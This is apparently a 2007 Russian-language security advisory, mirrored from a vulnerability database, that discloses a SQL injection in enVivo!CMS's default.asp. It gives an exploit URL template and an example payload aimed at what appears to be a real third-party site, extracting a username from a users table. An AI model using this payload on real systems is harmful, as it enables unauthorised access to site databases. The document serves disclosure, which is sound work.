Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17425
HistoryJul 06, 2007 - 12:00 a.m.

SQL-инъекция в enVivo!CMS

2007-07-0600:00:00
vulners.com
4468

Здравствуйте, 3APA3A.

Software: enVivo!CMS
Vendor: www.envivosoft.com
Vulnerability: SQL-инъекция
Risk: высокий
Date: 6.07.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
www.damagelab.org

+~~~:| Details |:

SQL-инъекция в скрипте default.asp

+~~~:| Экплойт |:

http://www.target.com/default.asp?action=article&ID=[SQL]

+~~~:| Пример |:

http://www.foster-adopt.org/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--


С уважением,
durito [NGH Group] mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru